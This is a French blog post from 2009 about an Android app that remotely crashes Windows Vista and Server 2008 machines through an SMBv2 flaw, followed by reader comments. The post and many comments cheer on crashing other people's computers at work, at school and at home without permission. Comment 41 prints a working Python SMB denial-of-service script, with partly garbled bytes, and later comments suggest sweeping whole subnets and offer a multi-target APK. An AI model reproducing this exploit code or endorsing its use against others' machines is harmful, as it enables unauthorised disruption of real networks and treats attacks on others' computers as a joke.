BlogBang

Devenez The Master of BSoD grâce à Android

Par Korben | Nb visites : 379

bsodgirl Aaargh, cest linvasion des écrans bleus !

La semaine dernière, le petit monde Windows était en émoi car un chercheur en sécurité a découvert une faille dans Vista et Seven qui permet de provoquer à distance un joli écran bleu (BSoD de son petit nom)… Bon, jusque là, tout va bien… L’exploit et son Proof of concept sont expliqués ici pour tester les machine vulnérables et les patcher (ou répandre enfer et désolation autour de vous si vous n’avez pas de coeur).

Mais là où ça devient marrant, c’est que depuis hier, on trouve sur l’Android Market, une petite application pour téléphone qui met en application cet exploit… Elle coûte 0,50 £ et vous permettra de semer la terreur au boulot, en salle de cours ou dans les lieux public… Raaah c’est mal !!

[Screenshot.png]

Il suffit d’être connecté avec votre téléphone au même réseau que les ordinateurs à tester et d’entrer l’ip de ceux-ci… Et PAF, à vous l’écran bleu de la mort qui tue…

Ouais, c’est mal, mais ça me replonge en enfance avec le célèbre Nuke qu’on a tous usé jusqu’à la moelle à l’école… Raaaah (bis)

Appli à télécharger :


Devenez The Master of BSoD grâce à Android
ou sur l’Android Market !

Publicité

Je vous recommande aussi la lecture des sujets suivants


Faites un lien vers cette news sur votre site



52 commentaires

  1. lemulot Reply to this comment


    perso mon pc est tellement pourri qu’il n’a pas forcement besoin d’avoir ca pour BSOD !

    Du point de vu ethique je suis contre que ce soit payant m’enfin ..

    Posté le 15 septembre 2009 à 15:42:57

  2. Android ca sert pas seulement a téléphoner | La Tribune de Drakken Reply to this comment


    [...] petit lien… du genre très [...]

    Posté le 15 septembre 2009 à 15:47:37

  3. myself Reply to this comment


    y a la meme chose en gratuit : bsdroid

    Posté le 15 septembre 2009 à 15:50:57

  4. Em3Ze Reply to this comment


    Et sur iPhone ? =)

    Posté le 15 septembre 2009 à 15:52:11

  5. jonhdoe Reply to this comment


    http://img2.imageshack.us/img2/8063/devicep.png
    bsodroid exactement

    Posté le 15 septembre 2009 à 15:53:23

  6. lemulot Reply to this comment


    @Em3Ze: j’ai bien envie de de dire OSEF DES IPHONES :P

    Posté le 15 septembre 2009 à 16:00:10

  7. jonhdoe Reply to this comment


    lien vers l’appli : http://www.dereenigne.com/

    Posté le 15 septembre 2009 à 16:01:54

  8. RpGmAx Reply to this comment


    Merci jonhdoe, testé à l’instant au taf = çà marche ;)

    Posté le 15 septembre 2009 à 16:10:10

  9. jonhdoe Reply to this comment


    ahah le con j’avais meme pas test encore

    Posté le 15 septembre 2009 à 16:11:03

  10. xbb Reply to this comment


    J’ai pas android, je veux répandre le mal et la terreur. Comment je fais ? :p iPhone ? (ça j’ai !)

    Posté le 15 septembre 2009 à 16:21:47

  11. benvoyons Reply to this comment


    Salut !

    C est peut etre tres con, mais je vois toujours ces images carrées avec des carrés dedans qui seraient censées être lisibles par tout le monde sauf moi, et qui désignerait une application, un lien … …

    Pour ne pas mourir con : comment fait on pour utiliser ce genre d’image ? on prend une photo avec le telephone ???

    Merci de la réponse

    !

    Posté le 15 septembre 2009 à 16:23:16

  12. jonhdoe Reply to this comment


    @benvoyons: @benvoyons:
    exactement, sous un phone android t’as barecode scanner
    sur les autre j’sais pas trop

    Posté le 15 septembre 2009 à 16:24:57

  13. xbb Reply to this comment


    @benvoyons: Essaye beetag sous iPhone (gratuit). Sauf que ça servira à rien vu que c’est un lien vers une app android :p.
    Mais beetag sait lire ces codes barres en 2d :)

    Posté le 15 septembre 2009 à 16:28:57

  14. benvoyons Reply to this comment


    Wow cool ;)

    Mourir intelligent est un progrès satisfaisant pour la journée ;)

    merci @jonhdoe :)

    Posté le 15 septembre 2009 à 16:32:50

  15. benvoyons Reply to this comment


    xbb : je suis sous android (galaxy 7500) et avec barcode (sans le e) ca marche parfaitement !

    Merci tout de meme !

    Posté le 15 septembre 2009 à 16:40:45

  16. Nero Reply to this comment


    Pour compléter la réponse de john doe, cette image s’appelle un QR Code et est simplement un cryptage d’une chaine de caractère. En l’occurence ici, le QR Code contient un lien vers l’appli dans l’android market.
    Ensuite, tu utilises l’application Barcode Scanner qui va décrypter le QR Code à l’aide de l’appareil photo et t’envoyer directement sur le téléchargement de l’application ;)

    Posté le 15 septembre 2009 à 16:43:21

  17. lemulot Reply to this comment


    @benvoyons: C’est simplement un code barre 3d (l’article de wikipedia est intéressent)

    Posté le 15 septembre 2009 à 16:48:57

  18. benjamin Reply to this comment


    T’as même pas idée comment je suis en train de me marrer au boulot là :D

    Posté le 15 septembre 2009 à 17:00:16

  19. lemulot Reply to this comment


    @benjamin: essayer oui, le faire plusieurs fois je trouve ca assez moyen … j’espere que tu vas te faire chopper, la, sa sera drole :D

    Posté le 15 septembre 2009 à 17:06:42

  20. benjamin Reply to this comment


    @lemulot: ils ont capté de qui ça venait… du coup, ils m’amènent les ips des autres pcs :) (boîte de dev donc… ;p)

    Posté le 15 septembre 2009 à 17:15:25

  21. Deadeye Reply to this comment


    si le parfeu de vista est actif ca marche pas.

    Posté le 15 septembre 2009 à 17:18:18

  22. yelle Reply to this comment


    Vous avez la même chose pour ma machine virtuelle Ubuntu ?

    Ca doit bien le faire.

    Moi aussi, je veux jouer :)

    Posté le 15 septembre 2009 à 17:28:25

  23. artiflo Reply to this comment


    Et il faut que le partage smb sois activé, non ?

    Ce qui dans le cas de machine qui ne sont pas serveur est assez rare.

    Posté le 15 septembre 2009 à 17:34:05

  24. krank Reply to this comment


    Tout a fait, le partage smb doit être activé, sinon ça ne fonctionne pas.
    Par contre ce qui pu bien c’est que cela touche aussi 2008 serveur, là ça craint.
    Cher collègues SysAdmin à vos patch ;-)

    Posté le 15 septembre 2009 à 17:46:39

  25. Gana Reply to this comment


    y’a pas la même chose pour Pico Inox RX-180 ?

    Posté le 15 septembre 2009 à 18:13:20

  26. Ptitkarl Reply to this comment


    Magique, testé tout à l’heure en cours, couplé à un scanneur d’ip c’est le pied :)

    Posté le 15 septembre 2009 à 18:27:06

  27. k3nshin Reply to this comment


    Testé sur Vista32 & 64, avec le script python, ça marche du tonnerre :)
    (Sauf si le firewall de la cible est actif …)
    Raaah comme au bon vieux temps! ^^

    Posté le 15 septembre 2009 à 19:01:18

  28. Xeo Reply to this comment


    A quand sur iPhone? Bon ok ok…

    Posté le 15 septembre 2009 à 20:03:11

  29. Bouu Reply to this comment


    Wouaaahhh !!!
    Géant c’est trop fort j’ai essayé (pas sur un tel) d’executer le code à partir de mon ordi pour attaquer l’ordi de mon frère (niark niark!), et je peux dire que c’est radical !
    Il faut avouer que c’est la première fois que wow se quitte aussi vite :D

    Et comme d’habitude :
    Je suis content d’avoir un mac ;)
    Allez que du bonheur \o/

    Posté le 15 septembre 2009 à 20:26:38

  30. ProxyJ Reply to this comment


    Salut !

    Peut-être que ma question est un peu bête, mais est-ce que provoquer un BsoD peut-il être dangereux pour la machine ? Ou un simple redémarrage permet de régler le problème ?

    Merci d’avance pour vos réponses,

    Posté le 15 septembre 2009 à 21:01:31

  31. xbb Reply to this comment


    J’ai une idée !
    Pour iPhone jailbreaké, il suffit d’avoir un interpréteur python, un ptit transfert du fichier contenant le script et hop c’est dans la boite !

    Posté le 15 septembre 2009 à 21:02:29

  32. Zaoza Reply to this comment


    Ça c’est du nolife…

    Posté le 15 septembre 2009 à 22:04:42

  33. Murphy Reply to this comment


    @Ptitkarl:
    Quelqu’un connait un scanneur d’ip gratuit pour Android ?

    Posté le 15 septembre 2009 à 22:12:19

  34. Bouu Reply to this comment


    @xbb : bonne idée je test ça tout de suite ;)

    @Zaoza : mais non c’est de la geekomania aigue :D

    Sinon je pense qu’il faudrait un p’tit programmeur pour adapter le code pour y rajouter un scan de toutes les ip locales… après vous connaissez la suite ^^.
    Je sais je suis très méchant mais j’ai bien envie de faire sauter tout mon lycée d’un coup Mouhahaha !!

    Posté le 15 septembre 2009 à 22:15:51

  35. MikeZ Reply to this comment


    @Deadeye

    Oui mais utiliser le parefeu de vista c’est déjà de l’hérésie donc a priori le mec qui fait ca est Masochiste, et tu va le faire jouir a chaque BSOD que tu provoques ;)

    (Quoi, vista est une hérésie à lui tout seul? Au secours, un troll ;)

    Euh Korben je pige pas pourquoi tu parles de Seven alors que dans l’article sous le lien « patch » il est indiqué que Seven n’est pas affecté mais Vista et les serveurs 2008 ?

    Posté le 15 septembre 2009 à 22:36:01

  36. The Shughart Insider » vista-bsod Reply to this comment


    [...] Un article sur une faille de Vista qui fait beaucoup marrer ! [...]

    Posté le 16 septembre 2009 à 01:14:44

  37. al.jes Reply to this comment


    Et là, je suis dégouté d’avoir un iPhone même pas jailbreaké…
    Quelqu’un m’offre un HTC Hero ?

    Posté le 16 septembre 2009 à 10:50:35

  38. Bibou Reply to this comment


    Hi guys,
    Sur iPhone trop facile, testé au taf sur un vista l instant :)
    il suffit d’avoir: iPhone JB, mobile terminal, python.
    Copier le script python en scp et c’est gagné :)

    Posté le 16 septembre 2009 à 11:05:03

  39. Droïde Reply to this comment


    Approuvé sous Seven, je viens de tester avec mon HTC Dream avec bsdroid.

    Posté le 16 septembre 2009 à 13:13:23

  40. yelle Reply to this comment


    Approuvé sur un serveur windows 2008 de mon admin systeme windows.

    Désormais, il me craint :)

    Posté le 16 septembre 2009 à 14:22:55

  41. Bjnn Reply to this comment


    Pour mon iphone j’ai bidouillé ça (enfin juste la question qui demande l’adresse ip hein…), a lancer en terminal avec python :

    ______________________________________________
    from socket import socket
    from time import sleep

    IP = raw_input(« IP local : « )
    host = IP, 445
    buff = (
    « x00×00x00×90″ # Begin SMB header: Session message
    « xffx53×4dx42″ # Server Component: SMB
    « x72×00x00×00″ # Negociate Protocol
    « x00×18x53xc8″ # Operation 0×18 & sub 0xc853
    « x00×26″# Process ID High: –> :) normal value should be « x00×00″
    « x00×00x00×00x00×00x00×00x00×00xffxffxffxfe »
    « x00×00x00×00x00×6dx00×02x50×43x20×4ex45×54″
    « x57×4fx52×4bx20×50x52×4fx47×52x41×4dx20×31″
    « x2ex30×00x02×4cx41×4ex4dx41×4ex31×2ex30×00″
    « x02×57x69×6ex64×6fx77×73x20×66x6fx72×20x57″
    « x6fx72×6bx67×72x6fx75×70x73×20x33×2ex31×61″
    « x00×02x4cx4dx31×2ex32×58x30×30x32×00x02×4c »
    « x41×4ex4dx41×4ex32×2ex31×00x02×4ex54×20x4c »
    « x4dx20×30x2ex31×32x00×02x53×4dx42×20x32×2e »
    « x30×30x32×00″
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()
    _____________________________________________

    Le seul truc c’est que j’ai pas de pc sous windows sous la mains, si quelqu’un peut me dire si ça marche =)

    Edit : avec des guillemets à la place des « , interdit ici surement par question de sécurité

    Posté le 16 septembre 2009 à 15:44:03

  42. Bouu Reply to this comment


    @Bjnn:
    Ton truc marche très bien je peux te le confirmer.
    Il faut tout de même avouer que c’est plus classe de faire tout péter avec juste une iphone :D

    PS: je suis tellement nul en python que je savais même pas que pour demander qqch c’était raw_input() xD (faudrait vraiment que je m’y mette un jour …)

    Posté le 16 septembre 2009 à 22:19:00

  43. Bjnn Reply to this comment


    @Bouu
    Ok merci d’avoir testé ^^, jsuis pas très doué non plus en python, le top ce serai de mettre par défaut 192.168.1.x et de demander à rentrer que x, encore moins chiant.

    Et encore plus vicieux, en poussant un peux plus loin on pourrai caler un incrémenteur sur x pour planter les 255 machines potentiellement connectés XD

    Posté le 16 septembre 2009 à 23:20:57

  44. No0ne Reply to this comment


    Voici une premiere version pour envoyer sur plusieurs ip.
    Avec en prime un service, qui tourne toutes les minutes :-)

    http://jump.fm/YIVRX

    adb install SmbPoc.apk

    Posté le 17 septembre 2009 à 02:18:54

  45. Armetiz Reply to this comment


    Pfui, les gens ne sont même pas drôles… Ils ne veulent pas désactivé le firewall :(

    Posté le 17 septembre 2009 à 10:12:07

  46. Jo Reply to this comment


    @ Bjnn: salut, comment on utilise ton code sur l’iPhone?
    J’ai python et terminal, mais je sais pas comment on lance l’exécution du code.
    Merci

    Posté le 17 septembre 2009 à 10:22:27

  47. jofrenchy Reply to this comment


    Idem

    Posté le 17 septembre 2009 à 11:10:52

  48. Bjnn Reply to this comment


    Déjà qu’on nage en plein script kidding va tetre pas faloir pousser les gars :) renseigner vous sur le python via Google, en 5min vous aurez la rep a votre question et en 1h les bases du langage.

    Posté le 17 septembre 2009 à 21:18:32

  49. Technologix Reply to this comment


    Pas d’application pour Windows?

    Posté le 18 septembre 2009 à 20:13:11

  50. Bjnn Reply to this comment


    Le proof of concept est un script python, le python est un langage interprété (CF Wikipedia), donc suffit d’avoir l’interpréteur python d’installer et tu peux lances le script, que ce soit sur windows, linux, mac, iphone et tout ce qui possède un interpréteur python, c’est à dire beaucoup d’OS…

    Posté le 18 septembre 2009 à 21:49:27

  51. elban44 Reply to this comment


    Android c’est vraiment le système mobile d’avenir.

    Sur mon blog j’explique pourquoi c’est préférable aux systèmes propriétaires

    http://a.drouan.free.fr/

    Posté le 26 septembre 2009 à 15:34:51

  52. Corentin Reply to this comment


    J’ai fait l’application gratuitement sous le nom de : WinExploitSMBv2 (disponible sur le market)

    Posté le 9 octobre 2009 à 14:08:02